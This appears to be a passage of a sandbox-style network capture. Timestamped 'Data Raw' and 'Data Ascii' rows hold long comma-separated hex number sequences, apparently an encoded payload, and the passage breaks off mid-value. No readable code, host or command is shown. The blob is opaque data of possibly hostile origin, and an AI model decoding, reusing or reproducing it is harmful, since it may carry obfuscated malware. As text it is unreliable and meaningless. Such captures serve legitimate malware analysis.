                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1299INData Raw: 2c 31 30 64 2c 31 31 66 2c 66 34 2c 63 61 2c 31 30 34 2c 31 33 33 2c 31 31 32 2c 31 32 39 2c 64 64 2c 31 33 38 2c 31 33 34 2c 65 39 2c 64 65 2c 63 34 2c 63 64 2c 65 37 2c 65 31 2c 65 34 2c 65 38 2c 63 33 2c 63 34 2c 65 34 2c 66 38 2c 63 38 2c 64 62 2c 61 66 2c 31 30 31 2c 66 62 2c 64 65 2c 65 34 2c 31 32 62 2c 31 31 33 2c 31 31 32 2c 31 32 33 2c 66 34 2c 66 39 2c 31 33 35 2c 31 32 39 2c 31 30 64 2c 31 32 35 2c 64 64 2c 31 30 39 2c 66 63 2c 65 63 2c 65 65 2c 64 33 2c 31 31 32 2c 31 35 34 2c 31 30 61 2c 31 31 31 2c 64 31 2c 63 33 2c 62 37 2c 63 39 2c 66 65 2c 63 30 2c 66 33 2c 63 31 2c 64 31 2c 65 34 2c 66 34 2c 64 35 2c 65 38 2c 31 31 32 2c 31 31 39 2c 31 31 61 2c 66 31 2c 63 61 2c 64 36 2c 31 32 64 2c 31 31 32 2c 31 32 39 2c 64 64 2c 31 33 38 2c 31 33 34
                                                                                                                                                                                                                            Data Ascii: ,10d,11f,f4,ca,104,133,112,129,dd,138,134,e9,de,c4,cd,e7,e1,e4,e8,c3,c4,e4,f8,c8,db,af,101,fb,de,e4,12b,113,112,123,f4,f9,135,129,10d,125,dd,109,fc,ec,ee,d3,112,154,10a,111,d1,c3,b7,c9,fe,c0,f3,c1,d1,e4,f4,d5,e8,112,119,11a,f1,ca,d6,12d,112,129,dd,138,134
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1315INData Raw: 2c 65 34 2c 66 66 2c 62 30 2c 63 35 2c 31 30 30 2c 66 38 2c 66 35 2c 63 32 2c 31 30 33 2c 66 37 2c 66 31 2c 65 66 2c 31 33 32 2c 65 33 2c 66 35 2c 66 33 2c 65 32 2c 65 38 2c 63 33 2c 63 30 2c 63 37 2c 31 32 30 2c 63 32 2c 63 65 2c 63 31 2c 63 36 2c 31 31 34 2c 63 66 2c 64 61 2c 65 38 2c 66 31 2c 64 32 2c 65 38 2c 65 65 2c 64 36 2c 63 63 2c 65 62 2c 65 36 2c 31 32 31 2c 31 30 62 2c 31 33 33 2c 31 30 30 2c 31 32 35 2c 63 34 2c 64 33 2c 65 66 2c 65 30 2c 65 35 2c 65 32 2c 65 30 2c 64 34 2c 65 38 2c 62 38 2c 65 66 2c 64 33 2c 63 37 2c 64 39 2c 64 31 2c 66 34 2c 63 39 2c 65 66 2c 65 33 2c 64 35 2c 65 36 2c 31 30 35 2c 65 61 2c 61 66 2c 64 30 2c 31 32 38 2c 31 31 36 2c 31 32 61 2c 31 33 63 2c 31 30 39 2c 64 35 2c 64 32 2c 61 66 2c 64 31 2c 63 65 2c 65 62 2c 65
                                                                                                                                                                                                                            Data Ascii: ,e4,ff,b0,c5,100,f8,f5,c2,103,f7,f1,ef,132,e3,f5,f3,e2,e8,c3,c0,c7,120,c2,ce,c1,c6,114,cf,da,e8,f1,d2,e8,ee,d6,cc,eb,e6,121,10b,133,100,125,c4,d3,ef,e0,e5,e2,e0,d4,e8,b8,ef,d3,c7,d9,d1,f4,c9,ef,e3,d5,e6,105,ea,af,d0,128,116,12a,13c,109,d5,d2,af,d1,ce,eb,e
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1331INData Raw: 64 32 2c 31 32 39 2c 62 37 2c 66 63 2c 63 30 2c 65 31 2c 63 66 2c 64 32 2c 65 65 2c 63 65 2c 63 66 2c 66 34 2c 64 63 2c 64 64 2c 66 31 2c 31 30 36 2c 62 61 2c 64 31 2c 31 30 30 2c 31 34 62 2c 66 62 2c 64 34 2c 31 30 37 2c 63 62 2c 62 37 2c 62 61 2c 63 34 2c 64 62 2c 31 30 37 2c 64 37 2c 66 32 2c 65 34 2c 31 33 37 2c 63 32 2c 63 35 2c 65 64 2c 64 35 2c 66 64 2c 62 33 2c 64 31 2c 65 39 2c 63 62 2c 64 34 2c 66 30 2c 66 38 2c 64 63 2c 66 34 2c 65 65 2c 31 32 39 2c 63 32 2c 31 30 30 2c 64 37 2c 66 66 2c 66 39 2c 66 39 2c 63 36 2c 62 31 2c 62 31 2c 63 33 2c 64 36 2c 31 30 37 2c 64 37 2c 66 32 2c 65 34 2c 31 33 37 2c 65 36 2c 62 62 2c 66 34 2c 63 34 2c 63 65 2c 62 64 2c 63 63 2c 65 61 2c 64 34 2c 64 34 2c 65 65 2c 66 38 2c 64 63 2c 66 34 2c 65 65 2c 31 32 39 2c
                                                                                                                                                                                                                            Data Ascii: d2,129,b7,fc,c0,e1,cf,d2,ee,ce,cf,f4,dc,dd,f1,106,ba,d1,100,14b,fb,d4,107,cb,b7,ba,c4,db,107,d7,f2,e4,137,c2,c5,ed,d5,fd,b3,d1,e9,cb,d4,f0,f8,dc,f4,ee,129,c2,100,d7,ff,f9,f9,c6,b1,b1,c3,d6,107,d7,f2,e4,137,e6,bb,f4,c4,ce,bd,cc,ea,d4,d4,ee,f8,dc,f4,ee,129,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1347INData Raw: 35 38 2c 65 63 2c 63 34 2c 63 31 2c 31 30 36 2c 31 30 33 2c 66 64 2c 63 39 2c 31 31 32 2c 64 33 2c 62 39 2c 61 65 2c 63 64 2c 31 34 32 2c 31 31 31 2c 64 37 2c 65 38 2c 64 35 2c 64 36 2c 63 30 2c 62 63 2c 65 65 2c 64 65 2c 64 66 2c 62 36 2c 63 61 2c 66 38 2c 31 33 64 2c 65 66 2c 65 61 2c 63 63 2c 31 30 34 2c 66 33 2c 64 66 2c 64 33 2c 64 34 2c 66 39 2c 64 36 2c 66 39 2c 31 33 63 2c 31 31 35 2c 63 66 2c 62 31 2c 63 64 2c 64 31 2c 64 36 2c 64 66 2c 65 31 2c 31 35 36 2c 65 32 2c 64 32 2c 62 35 2c 63 62 2c 31 31 64 2c 63 66 2c 64 61 2c 63 31 2c 63 61 2c 66 31 2c 63 39 2c 65 64 2c 66 62 2c 64 39 2c 64 36 2c 66 33 2c 31 35 33 2c 63 35 2c 64 30 2c 66 66 2c 65 61 2c 65 39 2c 64 30 2c 66 34 2c 64 65 2c 63 34 2c 62 37 2c 62 64 2c 64 64 2c 31 35 34 2c 66 66 2c 66 31
                                                                                                                                                                                                                            Data Ascii: 58,ec,c4,c1,106,103,fd,c9,112,d3,b9,ae,cd,142,111,d7,e8,d5,d6,c0,bc,ee,de,df,b6,ca,f8,13d,ef,ea,cc,104,f3,df,d3,d4,f9,d6,f9,13c,115,cf,b1,cd,d1,d6,df,e1,156,e2,d2,b5,cb,11d,cf,da,c1,ca,f1,c9,ed,fb,d9,d6,f3,153,c5,d0,ff,ea,e9,d0,f4,de,c4,b7,bd,dd,154,ff,f1
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1363INData Raw: 2c 66 31 2c 66 34 2c 66 63 2c 65 65 2c 64 30 2c 64 33 2c 65 61 2c 65 30 2c 64 38 2c 65 35 2c 65 61 2c 62 61 2c 63 37 2c 31 36 35 2c 31 30 61 2c 65 65 2c 63 63 2c 66 63 2c 63 62 2c 63 32 2c 63 32 2c 62 65 2c 64 39 2c 65 35 2c 64 38 2c 31 35 36 2c 65 32 2c 64 32 2c 62 35 2c 63 62 2c 31 32 30 2c 62 66 2c 63 63 2c 62 61 2c 64 61 2c 65 66 2c 63 39 2c 64 61 2c 66 39 2c 65 34 2c 64 37 2c 65 66 2c 65 34 2c 62 62 2c 31 33 35 2c 31 30 64 2c 31 31 36 2c 31 32 65 2c 31 30 33 2c 31 31 35 2c 63 66 2c 62 33 2c 61 64 2c 63 39 2c 64 66 2c 65 66 2c 31 30 33 2c 66 31 2c 64 37 2c 63 33 2c 63 30 2c 63 34 2c 66 38 2c 64 31 2c 64 66 2c 61 65 2c 64 61 2c 31 31 63 2c 63 38 2c 63 66 2c 66 34 2c 65 30 2c 64 64 2c 65 34 2c 65 61 2c 63 36 2c 64 34 2c 66 31 2c 65 32 2c 65 66 2c 63 65
                                                                                                                                                                                                                            Data Ascii: ,f1,f4,fc,ee,d0,d3,ea,e0,d8,e5,ea,ba,c7,165,10a,ee,cc,fc,cb,c2,c2,be,d9,e5,d8,156,e2,d2,b5,cb,120,bf,cc,ba,da,ef,c9,da,f9,e4,d7,ef,e4,bb,135,10d,116,12e,103,115,cf,b3,ad,c9,df,ef,103,f1,d7,c3,c0,c4,f8,d1,df,ae,da,11c,c8,cf,f4,e0,dd,e4,ea,c6,d4,f1,e2,ef,ce
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1379INData Raw: 32 33 2c 65 62 2c 64 64 2c 65 30 2c 31 30 35 2c 65 61 2c 64 64 2c 65 39 2c 63 34 2c 62 36 2c 65 61 2c 63 35 2c 63 65 2c 62 37 2c 66 36 2c 65 66 2c 63 39 2c 64 65 2c 65 61 2c 64 66 2c 65 61 2c 66 35 2c 65 65 2c 62 36 2c 31 33 35 2c 31 31 65 2c 65 36 2c 65 61 2c 66 33 2c 66 61 2c 63 30 2c 63 30 2c 62 31 2c 63 63 2c 65 31 2c 66 31 2c 65 31 2c 65 33 2c 31 34 39 2c 65 35 2c 63 34 2c 62 64 2c 66 32 2c 62 65 2c 64 62 2c 65 31 2c 64 33 2c 66 31 2c 65 66 2c 65 32 2c 65 66 2c 65 30 2c 64 38 2c 65 38 2c 66 32 2c 63 36 2c 64 30 2c 66 32 2c 31 34 62 2c 31 30 62 2c 63 33 2c 66 35 2c 63 30 2c 63 30 2c 62 36 2c 31 30 34 2c 66 65 2c 66 33 2c 64 32 2c 66 35 2c 31 31 62 2c 66 32 2c 62 62 2c 62 36 2c 66 38 2c 63 30 2c 63 37 2c 66 34 2c 66 62 2c 66 38 2c 63 61 2c 64 61 2c 66
                                                                                                                                                                                                                            Data Ascii: 23,eb,dd,e0,105,ea,dd,e9,c4,b6,ea,c5,ce,b7,f6,ef,c9,de,ea,df,ea,f5,ee,b6,135,11e,e6,ea,f3,fa,c0,c0,b1,cc,e1,f1,e1,e3,149,e5,c4,bd,f2,be,db,e1,d3,f1,ef,e2,ef,e0,d8,e8,f2,c6,d0,f2,14b,10b,c3,f5,c0,c0,b6,104,fe,f3,d2,f5,11b,f2,bb,b6,f8,c0,c7,f4,fb,f8,ca,da,f
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1395INData Raw: 2c 31 31 30 2c 64 64 2c 63 38 2c 63 38 2c 62 36 2c 31 31 32 2c 63 32 2c 66 63 2c 62 64 2c 64 39 2c 66 63 2c 63 38 2c 64 37 2c 65 38 2c 31 34 35 2c 66 37 2c 65 39 2c 31 30 35 2c 62 34 2c 63 39 2c 66 39 2c 65 61 2c 66 63 2c 64 30 2c 31 30 33 2c 66 30 2c 63 34 2c 61 66 2c 63 64 2c 65 65 2c 65 62 2c 64 39 2c 66 31 2c 66 61 2c 64 31 2c 63 33 2c 64 37 2c 66 63 2c 63 30 2c 66 31 2c 62 30 2c 66 62 2c 66 38 2c 64 37 2c 65 32 2c 65 37 2c 64 39 2c 64 37 2c 31 35 38 2c 66 66 2c 62 61 2c 66 31 2c 31 30 34 2c 64 37 2c 66 39 2c 65 38 2c 66 66 2c 63 37 2c 63 30 2c 64 34 2c 63 63 2c 64 63 2c 31 30 31 2c 65 31 2c 65 32 2c 66 61 2c 63 35 2c 65 35 2c 63 35 2c 66 62 2c 64 33 2c 63 62 2c 62 36 2c 63 62 2c 31 35 64 2c 65 39 2c 64 34 2c 31 30 65 2c 64 30 2c 64 66 2c 65 63 2c 66
                                                                                                                                                                                                                            Data Ascii: ,110,dd,c8,c8,b6,112,c2,fc,bd,d9,fc,c8,d7,e8,145,f7,e9,105,b4,c9,f9,ea,fc,d0,103,f0,c4,af,cd,ee,eb,d9,f1,fa,d1,c3,d7,fc,c0,f1,b0,fb,f8,d7,e2,e7,d9,d7,158,ff,ba,f1,104,d7,f9,e8,ff,c7,c0,d4,cc,dc,101,e1,e2,fa,c5,e5,c5,fb,d3,cb,b6,cb,15d,e9,d4,10e,d0,df,ec,f
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1411INData Raw: 64 37 2c 61 37 2c 34 37 2c 62 35 2c 64 37 2c 36 39 2c 64 65 2c 38 66 2c 38 36 2c 62 33 2c 37 61 2c 34 31 2c 62 31 2c 39 38 2c 37 32 2c 63 36 2c 63 61 2c 36 37 2c 62 37 2c 39 64 2c 34 38 2c 65 30 2c 38 37 2c 35 65 2c 61 32 2c 39 33 2c 37 62 2c 62 64 2c 39 35 2c 37 61 2c 63 34 2c 39 64 2c 37 36 2c 64 33 2c 37 66 2c 35 33 2c 65 35 2c 62 64 2c 37 63 2c 62 63 2c 62 61 2c 35 32 2c 61 34 2c 37 37 2c 35 30 2c 63 32 2c 61 38 2c 36 34 2c 64 36 2c 39 63 2c 35 35 2c 61 38 2c 37 63 2c 37 66 2c 62 34 2c 62 32 2c 34 30 2c 62 66 2c 62 30 2c 35 62 2c 63 32 2c 62 32 2c 36 33 2c 63 62 2c 63 62 2c 37 31 2c 61 39 2c 38 39 2c 38 33 2c 63 62 2c 62 32 2c 35 61 2c 65 38 2c 38 61 2c 34 33 2c 61 32 2c 38 37 2c 36 30 2c 64 33 2c 39 37 2c 37 34 2c 63 39 2c 38 62 2c 34 37 2c 61 39 2c
                                                                                                                                                                                                                            Data Ascii: d7,a7,47,b5,d7,69,de,8f,86,b3,7a,41,b1,98,72,c6,ca,67,b7,9d,48,e0,87,5e,a2,93,7b,bd,95,7a,c4,9d,76,d3,7f,53,e5,bd,7c,bc,ba,52,a4,77,50,c2,a8,64,d6,9c,55,a8,7c,7f,b4,b2,40,bf,b0,5b,c2,b2,63,cb,cb,71,a9,89,83,cb,b2,5a,e8,8a,43,a2,87,60,d3,97,74,c9,8b,47,a9,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1427INData Raw: 2c 62 63 2c 62 63 2c 35 32 2c 61 35 2c 39 37 2c 35 30 2c 63 32 2c 63 37 2c 36 34 2c 64 35 2c 39 62 2c 35 35 2c 61 39 2c 39 63 2c 37 66 2c 62 34 2c 62 31 2c 34 30 2c 62 66 2c 64 32 2c 35 62 2c 63 32 2c 62 32 2c 36 33 2c 63 61 2c 61 65 2c 37 31 2c 61 39 2c 61 37 2c 38 33 2c 63 62 2c 62 33 2c 35 61 2c 65 38 2c 61 38 2c 34 33 2c 61 33 2c 61 36 2c 36 30 2c 64 33 2c 39 61 2c 37 34 2c 63 38 2c 38 38 2c 34 37 2c 61 61 2c 62 37 2c 35 32 2c 63 30 2c 39 37 2c 35 64 2c 64 63 2c 39 33 2c 36 31 2c 64 62 2c 39 37 2c 36 39 2c 64 38 2c 63 38 2c 34 37 2c 62 35 2c 64 37 2c 36 39 2c 64 65 2c 61 66 2c 38 36 2c 62 33 2c 37 38 2c 34 31 2c 62 31 2c 39 33 2c 37 32 2c 63 36 2c 63 38 2c 36 37 2c 62 37 2c 39 62 2c 34 38 2c 65 30 2c 38 35 2c 35 65 2c 61 31 2c 39 30 2c 37 62 2c 62 63
                                                                                                                                                                                                                            Data Ascii: ,bc,bc,52,a5,97,50,c2,c7,64,d5,9b,55,a9,9c,7f,b4,b1,40,bf,d2,5b,c2,b2,63,ca,ae,71,a9,a7,83,cb,b3,5a,e8,a8,43,a3,a6,60,d3,9a,74,c8,88,47,aa,b7,52,c0,97,5d,dc,93,61,db,97,69,d8,c8,47,b5,d7,69,de,af,86,b3,78,41,b1,93,72,c6,c8,67,b7,9b,48,e0,85,5e,a1,90,7b,bc
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1443INData Raw: 30 2c 64 34 2c 62 38 2c 37 34 2c 63 38 2c 38 39 2c 34 37 2c 61 61 2c 64 36 2c 35 32 2c 62 66 2c 37 35 2c 35 64 2c 64 64 2c 39 33 2c 36 31 2c 64 62 2c 39 39 2c 36 39 2c 64 38 2c 61 35 2c 34 37 2c 62 35 2c 64 38 2c 36 39 2c 64 65 2c 38 66 2c 38 36 2c 62 33 2c 37 36 2c 34 31 2c 62 32 2c 39 38 2c 37 32 2c 63 35 2c 61 62 2c 36 37 2c 62 37 2c 37 63 2c 34 38 2c 65 31 2c 38 37 2c 35 65 2c 61 32 2c 39 35 2c 37 62 2c 62 63 2c 39 38 2c 37 61 2c 63 34 2c 39 63 2c 37 36 2c 64 33 2c 39 62 2c 35 33 2c 65 35 2c 62 66 2c 37 63 2c 62 63 2c 64 39 2c 35 32 2c 61 35 2c 39 35 2c 35 30 2c 63 32 2c 63 36 2c 36 34 2c 64 36 2c 62 63 2c 35 35 2c 61 39 2c 37 66 2c 37 66 2c 62 34 2c 62 34 2c 34 30 2c 62 66 2c 62 31 2c 35 62 2c 63 32 2c 62 30 2c 36 33 2c 63 62 2c 61 61 2c 37 31 2c 61
                                                                                                                                                                                                                            Data Ascii: 0,d4,b8,74,c8,89,47,aa,d6,52,bf,75,5d,dd,93,61,db,99,69,d8,a5,47,b5,d8,69,de,8f,86,b3,76,41,b2,98,72,c5,ab,67,b7,7c,48,e1,87,5e,a2,95,7b,bc,98,7a,c4,9c,76,d3,9b,53,e5,bf,7c,bc,d9,52,a5,95,50,c2,c6,64,d6,bc,55,a9,7f,7f,b4,b4,40,bf,b1,5b,c2,b0,63,cb,aa,71,a
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1459INData Raw: 2c 31 33 35 2c 31 31 62 2c 31 30 64 2c 31 35 63 2c 31 32 33 2c 62 66 2c 63 64 2c 31 33 38 2c 31 35 64 2c 31 33 61 2c 31 33 35 2c 31 33 66 2c 31 34 30 2c 31 34 33 2c 31 35 30 2c 31 34 39 2c 31 32 39 2c 31 33 31 2c 31 35 37 2c 31 32 65 2c 31 35 39 2c 31 33 34 2c 31 36 30 2c 31 32 33 2c 61 34 2c 63 65 2c 31 32 38 2c 31 34 32 2c 31 35 30 2c 31 33 38 2c 31 33 39 2c 31 34 34 2c 31 32 66 2c 31 32 31 2c 31 31 38 2c 65 30 2c 66 33 2c 31 33 38 2c 31 32 32 2c 31 33 63 2c 31 34 30 2c 31 33 38 2c 31 32 36 2c 31 35 37 2c 31 33 64 2c 31 34 33 2c 31 35 32 2c 31 35 33 2c 31 32 38 2c 31 32 34 2c 65 34 2c 66 32 2c 31 35 39 2c 31 33 37 2c 31 36 38 2c 31 33 32 2c 31 32 30 2c 31 31 65 2c 31 32 64 2c 31 33 64 2c 31 35 34 2c 31 34 34 2c 31 34 38 2c 31 34 36 2c 31 32 66 2c 31 31
                                                                                                                                                                                                                            Data Ascii: ,135,11b,10d,15c,123,bf,cd,138,15d,13a,135,13f,140,143,150,149,129,131,157,12e,159,134,160,123,a4,ce,128,142,150,138,139,144,12f,121,118,e0,f3,138,122,13c,140,138,126,157,13d,143,152,153,128,124,e4,f2,159,137,168,132,120,11e,12d,13d,154,144,148,146,12f,11
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1475INData Raw: 32 2c 31 30 37 2c 31 32 33 2c 31 32 30 2c 63 31 2c 37 37 2c 31 33 31 2c 31 34 34 2c 63 39 2c 38 61 2c 31 32 37 2c 31 31 38 2c 65 30 2c 35 37 2c 31 32 32 2c 31 32 32 2c 31 32 37 2c 31 34 64 2c 31 33 63 2c 31 33 65 2c 31 34 37 2c 31 33 33 2c 63 62 2c 37 66 2c 31 35 32 2c 31 30 62 2c 31 33 35 2c 31 35 33 2c 63 61 2c 37 64 2c 31 32 65 2c 31 34 62 2c 31 32 32 2c 61 34 2c 34 61 2c 31 32 31 2c 63 31 2c 36 62 2c 31 33 34 2c 64 35 2c 35 63 2c 31 32 32 2c 31 31 39 2c 31 32 39 2c 31 35 66 2c 31 31 66 2c 31 32 65 2c 61 32 2c 36 36 2c 31 35 63 2c 31 31 66 2c 31 34 33 2c 31 34 61 2c 63 34 2c 36 61 2c 31 34 33 2c 31 34 31 2c 61 38 2c 31 30 34 2c 31 36 34 2c 31 33 39 2c 64 64 2c 35 66 2c 31 35 61 2c 31 32 34 2c 31 32 34 2c 31 32 31 2c 31 31 64 2c 31 33 30 2c 64 34 2c 36
                                                                                                                                                                                                                            Data Ascii: 2,107,123,120,c1,77,131,144,c9,8a,127,118,e0,57,122,122,127,14d,13c,13e,147,133,cb,7f,152,10b,135,153,ca,7d,12e,14b,122,a4,4a,121,c1,6b,134,d5,5c,122,119,129,15f,11f,12e,a2,66,15c,11f,143,14a,c4,6a,143,141,a8,104,164,139,dd,5f,15a,124,124,121,11d,130,d4,6
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1491INData Raw: 2c 61 37 2c 63 63 2c 31 35 33 2c 63 62 2c 39 31 2c 31 33 32 2c 31 36 38 2c 31 33 31 2c 31 32 33 2c 31 31 31 2c 62 30 2c 64 39 2c 31 34 32 2c 63 36 2c 38 39 2c 31 34 37 2c 31 32 63 2c 31 32 39 2c 31 32 38 2c 31 34 66 2c 62 32 2c 64 66 2c 31 31 30 2c 62 64 2c 31 30 34 2c 31 32 62 2c 63 33 2c 38 66 2c 31 33 39 2c 31 34 62 2c 31 35 35 2c 31 34 31 2c 61 37 2c 64 34 2c 31 35 33 2c 63 39 2c 31 30 35 2c 31 32 61 2c 65 38 2c 36 37 2c 31 32 33 2c 31 31 61 2c 31 33 32 2c 31 34 31 2c 31 33 37 2c 31 33 34 2c 64 34 2c 65 38 2c 31 32 35 2c 61 37 2c 64 31 2c 31 35 35 2c 31 33 34 2c 31 33 65 2c 31 30 35 2c 31 32 64 2c 64 62 2c 64 63 2c 31 33 31 2c 64 61 2c 65 63 2c 31 33 39 2c 64 38 2c 38 36 2c 31 31 63 2c 31 33 35 2c 31 36 32 2c 31 32 65 2c 31 34 63 2c 62 61 2c 31 30 37
                                                                                                                                                                                                                            Data Ascii: ,a7,cc,153,cb,91,132,168,131,123,111,b0,d9,142,c6,89,147,12c,129,128,14f,b2,df,110,bd,104,12b,c3,8f,139,14b,155,141,a7,d4,153,c9,105,12a,e8,67,123,11a,132,141,137,134,d4,e8,125,a7,d1,155,134,13e,105,12d,db,dc,131,da,ec,139,d8,86,11c,135,162,12e,14c,ba,107
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1507INData Raw: 62 2c 64 63 2c 65 32 2c 31 30 66 2c 65 61 2c 66 32 2c 63 37 2c 31 30 33 2c 31 30 30 2c 31 31 31 2c 31 32 32 2c 31 33 32 2c 31 34 31 2c 31 35 34 2c 66 32 2c 31 34 38 2c 31 34 35 2c 65 39 2c 63 38 2c 62 64 2c 66 63 2c 31 32 63 2c 66 33 2c 63 66 2c 65 39 2c 66 63 2c 64 31 2c 63 65 2c 66 37 2c 31 31 30 2c 31 33 37 2c 31 35 37 2c 31 35 33 2c 31 32 38 2c 31 33 35 2c 31 31 31 2c 31 33 64 2c 31 35 61 2c 65 65 2c 31 30 37 2c 63 37 2c 63 30 2c 31 31 62 2c 65 35 2c 65 66 2c 66 65 2c 65 35 2c 65 61 2c 64 34 2c 64 32 2c 66 33 2c 66 66 2c 31 36 30 2c 31 33 34 2c 31 33 65 2c 31 32 32 2c 65 62 2c 31 34 66 2c 31 33 39 2c 66 35 2c 66 62 2c 64 38 2c 65 36 2c 31 34 65 2c 31 30 36 2c 64 36 2c 65 36 2c 31 30 33 2c 65 31 2c 66 39 2c 64 39 2c 66 34 2c 31 30 33 2c 66 35 2c 63 66
                                                                                                                                                                                                                            Data Ascii: b,dc,e2,10f,ea,f2,c7,103,100,111,122,132,141,154,f2,148,145,e9,c8,bd,fc,12c,f3,cf,e9,fc,d1,ce,f7,110,137,157,153,128,135,111,13d,15a,ee,107,c7,c0,11b,e5,ef,fe,e5,ea,d4,d2,f3,ff,160,134,13e,122,eb,14f,139,f5,fb,d8,e6,14e,106,d6,e6,103,e1,f9,d9,f4,103,f5,cf
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1523INData Raw: 31 35 31 2c 31 34 64 2c 31 32 31 2c 31 31 38 2c 31 35 37 2c 31 34 33 2c 31 35 63 2c 31 33 34 2c 31 36 30 2c 31 32 63 2c 31 32 35 2c 31 32 30 2c 31 32 61 2c 31 33 34 2c 31 34 36 2c 31 33 35 2c 64 36 2c 31 34 63 2c 31 33 30 2c 31 30 39 2c 31 32 38 2c 31 35 39 2c 31 32 36 2c 31 32 66 2c 61 32 2c 31 34 32 2c 31 35 39 2c 31 31 64 2c 31 34 32 2c 31 34 65 2c 31 33 64 2c 31 34 36 2c 31 33 38 2c 31 35 32 2c 31 31 62 2c 31 31 38 2c 31 36 32 2c 31 34 37 2c 31 33 65 2c 31 33 62 2c 31 36 30 2c 31 33 31 2c 31 30 63 2c 31 31 63 2c 31 31 65 2c 31 33 39 2c 31 34 63 2c 31 34 34 2c 31 34 64 2c 31 33 65 2c 31 32 66 2c 31 32 31 2c 31 31 66 2c 31 35 39 2c 31 32 63 2c 31 33 36 2c 31 30 35 2c 31 32 65 2c 64 62 2c 35 31 2c 31 33 39 2c 31 35 34 2c 31 33 64 2c 31 34 33 2c 31 35 30
                                                                                                                                                                                                                            Data Ascii: 151,14d,121,118,157,143,15c,134,160,12c,125,120,12a,134,146,135,d6,14c,130,109,128,159,126,12f,a2,142,159,11d,142,14e,13d,146,138,152,11b,118,162,147,13e,13b,160,131,10c,11c,11e,139,14c,144,14d,13e,12f,121,11f,159,12c,136,105,12e,db,51,139,154,13d,143,150
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1539INData Raw: 31 31 62 2c 31 31 62 2c 31 32 33 2c 31 35 65 2c 31 32 32 2c 62 65 2c 31 30 35 2c 31 32 64 2c 64 62 2c 31 33 63 2c 31 32 65 2c 31 34 61 2c 63 35 2c 37 32 2c 31 35 37 2c 31 33 37 2c 31 32 34 2c 31 32 65 2c 31 36 34 2c 31 33 39 2c 64 63 2c 31 31 66 2c 31 36 30 2c 31 32 64 2c 31 32 33 2c 31 31 31 2c 62 30 2c 31 32 35 2c 31 34 32 2c 63 34 2c 31 33 35 2c 31 34 33 2c 31 33 30 2c 31 32 37 2c 31 31 38 2c 64 66 2c 31 31 37 2c 31 32 34 2c 31 31 62 2c 31 33 38 2c 31 35 62 2c 31 32 62 2c 63 31 2c 31 33 66 2c 31 32 37 2c 31 34 62 2c 31 35 30 2c 31 34 63 2c 31 32 37 2c 31 32 33 2c 65 33 2c 31 32 65 2c 31 34 63 2c 62 61 2c 31 34 33 2c 31 32 66 2c 31 30 35 2c 31 32 33 2c 31 32 30 2c 63 30 2c 31 32 66 2c 31 33 36 2c 31 34 66 2c 31 34 37 2c 31 32 32 2c 31 31 38 2c 61 35 2c
                                                                                                                                                                                                                            Data Ascii: 11b,11b,123,15e,122,be,105,12d,db,13c,12e,14a,c5,72,157,137,124,12e,164,139,dc,11f,160,12d,123,111,b0,125,142,c4,135,143,130,127,118,df,117,124,11b,138,15b,12b,c1,13f,127,14b,150,14c,127,123,e3,12e,14c,ba,143,12f,105,123,120,c0,12f,136,14f,147,122,118,a5,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1555INData Raw: 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31
                                                                                                                                                                                                                            Data Ascii: 9,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,1
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1571INData Raw: 35 2c 31 35 35 2c 31 34 36 2c 31 35 36 2c 61 31 2c 31 33 38 2c 31 32 39 2c 31 32 61 2c 62 65 2c 31 33 35 2c 31 34 30 2c 31 32 32 2c 61 32 2c 31 35 65 2c 31 33 64 2c 31 34 33 2c 63 35 2c 31 34 36 2c 31 34 35 2c 31 35 35 2c 63 38 2c 31 32 61 2c 39 64 2c 31 31 33 2c 31 34 34 2c 31 35 66 2c 39 65 2c 31 31 33 2c 31 33 34 2c 31 32 36 2c 38 37 2c 64 66 2c 31 34 32 2c 31 35 35 2c 61 62 2c 31 30 35 2c 31 34 39 2c 31 33 38 2c 39 30 2c 64 63 2c 31 36 31 2c 31 33 35 2c 61 39 2c 64 36 2c 31 33 66 2c 31 35 65 2c 61 38 2c 66 39 2c 31 35 63 2c 31 34 36 2c 62 38 2c 31 31 30 2c 31 35 33 2c 31 32 61 2c 61 34 2c 31 31 66 2c 31 34 62 2c 31 35 66 2c 61 64 2c 31 32 35 2c 31 33 34 2c 31 32 38 2c 39 35 2c 66 31 2c 31 